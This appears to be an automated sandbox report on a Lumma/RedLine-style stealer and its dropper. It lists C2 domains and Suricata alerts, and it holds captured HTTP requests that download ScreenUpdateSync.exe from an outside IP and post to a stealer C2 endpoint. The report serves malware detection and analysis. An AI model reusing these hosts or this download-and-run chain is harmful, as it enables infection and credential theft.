      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00918DC8
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then push esi4_2_00917D1A
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl4_2_0091CD37
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl4_2_0091CD78
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], AF697AECh4_2_00904E96
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then cmp al, 2Eh4_2_00916E96
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], E785F9BAh4_2_00904E87
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ebx, eax4_2_008FDE40
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ebx, eax4_2_008FDE40
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]4_2_00918FA0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then mov ecx, eax4_2_00905FD3
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]4_2_0092EF07
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]4_2_00906F35
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]4_2_00906F35
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4x nop then push 00000000h4_2_00919F40

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.12:49712 -> 172.67.220.223:443
      Source: Network trafficSuricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.12:49715 -> 172.67.220.223:443
      Source: Network trafficSuricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.12:51216 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.12:49712 -> 172.67.220.223:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49712 -> 172.67.220.223:443
      Source: Malware configuration extractorURLs: grannyejh.lat
      Source: Malware configuration extractorURLs: aspecteirs.lat
      Source: Malware configuration extractorURLs: necklacebudi.lat
      Source: Malware configuration extractorURLs: sustainskelet.lat
      Source: Malware configuration extractorURLs: crosshuaht.lat
      Source: Malware configuration extractorURLs: rapeflowwj.lat
      Source: Malware configuration extractorURLs: discokeyus.lat
      Source: Malware configuration extractorURLs: energyaffai.lat
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 18 Dec 2024 19:55:40 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 18 Dec 2024 19:45:02 GMTETag: "59e00-62990a64a108c"Accept-Ranges: bytesContent-Length: 368128Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 77 42 b3 41 33 23 dd 12 33 23 dd 12 33 23 dd 12 8e 6c 4b 12 32 23 dd 12 2d 71 59 12 2d 23 dd 12 2d 71 48 12 27 23 dd 12 2d 71 5e 12 5d 23 dd 12 14 e5 a6 12 36 23 dd 12 33 23 dc 12 40 23 dd 12 2d 71 57 12 32 23 dd 12 2d 71 49 12 32 23 dd 12 2d 71 4c 12 32 23 dd 12 52 69 63 68 33 23 dd 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 58 67 5f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f4 03 00 00 2a 3f 00 00 00 00 00 04 1a 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 43 00 00 04 00 00 fd 10 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 28 04 00 3c 00 00 00 00 10 42 00 f0 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc f3 03 00 00 10 00 00 00 f4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 21 00 00 00 10 04 00 00 22 00 00 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c c4 3d 00 00 40 04 00 00 70 00 00 00 1a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 12 01 00 00 10 42 00 00 14 01 00 00 8a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: Joe Sandbox ViewIP Address: 172.67.179.207 172.67.179.207
      Source: Joe Sandbox ViewIP Address: 176.113.115.19 176.113.115.19
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49712 -> 172.67.220.223:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49715 -> 172.67.220.223:443
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49711 -> 176.113.115.19:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49710 -> 172.67.179.207:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rapeflowwj.lat
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029F4
      Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
      Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
      Source: global trafficDNS traffic detected: DNS query: post-to-me.com
      Source: global trafficDNS traffic detected: DNS query: rapeflowwj.lat
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rapeflowwj.lat
      Source: sqJIHyPqhr.exe, 00000000.00000003.2513451673.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/
      Source: sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
      Source: sqJIHyPqhr.exe, 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
      Source: sqJIHyPqhr.exe, 00000000.00000003.2513451673.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exey
      Source: E093.tmp.exe, 00000004.00000003.2580762347.0000000000A51000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580522241.0000000000A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
      Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
      Source: sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
      Source: sqJIHyPqhr.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
      Source: sqJIHyPqhr.exe, 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
      Source: sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
      Source: sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEf6
      Source: E093.tmp.exe, 00000004.00000002.2679057343.00000000009E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/
      Source: E093.tmp.exe, 00000004.00000002.2679057343.00000000009E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/6
      Source: E093.tmp.exe, 00000004.00000002.2679025621.00000000009C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/Y
      Source: E093.tmp.exe, 00000004.00000003.2580522241.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000002.2679041344.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580784849.0000000000A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/api
      Source: E093.tmp.exe, 00000004.00000003.2580784849.0000000000A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/api1
      Source: E093.tmp.exe, 00000004.00000003.2580784849.0000000000A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/apiN
      Source: E093.tmp.exe, 00000004.00000002.2679106229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580784849.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580939365.0000000000A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/apip
      Source: E093.tmp.exe, 00000004.00000003.2580522241.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000002.2679041344.00000000009D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/apis
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.12:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.12:49712 version: TLS 1.2
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024A1942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_024A1942
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF

      System Summary

      barindex
      Source: 00000000.00000002.4891593646.00000000009D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000004.00000002.2679002116.0000000000999000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024A2361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_024A2361
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024A2605 NtdllDefWindowProc_W,PostQuitMessage,0_2_024A2605
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004280220_2_00428022
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004071AB0_2_004071AB
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004373D90_2_004373D9
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_0042D4EE0_2_0042D4EE
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004274840_2_00427484
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004285600_2_00428560
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_0043D6780_2_0043D678
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004166AF0_2_004166AF
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004137250_2_00413725
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004277F60_2_004277F6
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_0040E9740_2_0040E974
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_0042EAE00_2_0042EAE0
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_00427AA00_2_00427AA0
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_00418AAF0_2_00418AAF
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_00436CBF0_2_00436CBF
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_00427D670_2_00427D67
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_00413F0B0_2_00413F0B
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024C82890_2_024C8289
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024CED470_2_024CED47
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024B41720_2_024B4172
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024C76EB0_2_024C76EB
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024CD7550_2_024CD755
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024C87C70_2_024C87C7
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024C7A5D0_2_024C7A5D
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024AEBDB0_2_024AEBDB
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024B69160_2_024B6916
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024B398C0_2_024B398C
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024D6F260_2_024D6F26
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024C7FCE0_2_024C7FCE
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024CED470_2_024CED47
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024C7D070_2_024C7D07
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024B8D160_2_024B8D16
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004088504_2_00408850
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004238604_2_00423860
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004388104_2_00438810
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0041682D4_2_0041682D
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004288CB4_2_004288CB
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0043D8804_2_0043D880
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004218A04_2_004218A0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004309404_2_00430940
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004039704_2_00403970
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004209394_2_00420939
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004179C14_2_004179C1
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004231C24_2_004231C2
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004241C04_2_004241C0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0043B1D04_2_0043B1D0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004291DD4_2_004291DD
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0043D9804_2_0043D980
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004059904_2_00405990
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004221904_2_00422190
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0043D9974_2_0043D997
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0043D9994_2_0043D999
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004091B04_2_004091B0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0042CA494_2_0042CA49
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0042DA534_2_0042DA53
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004162634_2_00416263
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0040EA104_2_0040EA10
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004152204_2_00415220
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0042CAD04_2_0042CAD0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004252DD4_2_004252DD
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0041B2E04_2_0041B2E0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004062804_2_00406280
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0043DA804_2_0043DA80
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0041E2904_2_0041E290
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0041CB404_2_0041CB40
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0043D34D4_2_0043D34D
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00426B504_2_00426B50
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0043DB604_2_0043DB60
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00436B084_2_00436B08
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0042830D4_2_0042830D
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0042CB114_2_0042CB11
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004043204_2_00404320
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0042CB224_2_0042CB22
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004253274_2_00425327
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004083304_2_00408330
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0043F3304_2_0043F330
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0042A33F4_2_0042A33F
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0040DBD94_2_0040DBD9
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004243804_2_00424380
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0041FC754_2_0041FC75
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0041DC004_2_0041DC00
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00429C2B4_2_00429C2B
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004291DD4_2_004291DD
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004074F04_2_004074F0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0040ACF04_2_0040ACF0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0041148F4_2_0041148F
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0042AC904_2_0042AC90
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0043ECA04_2_0043ECA0
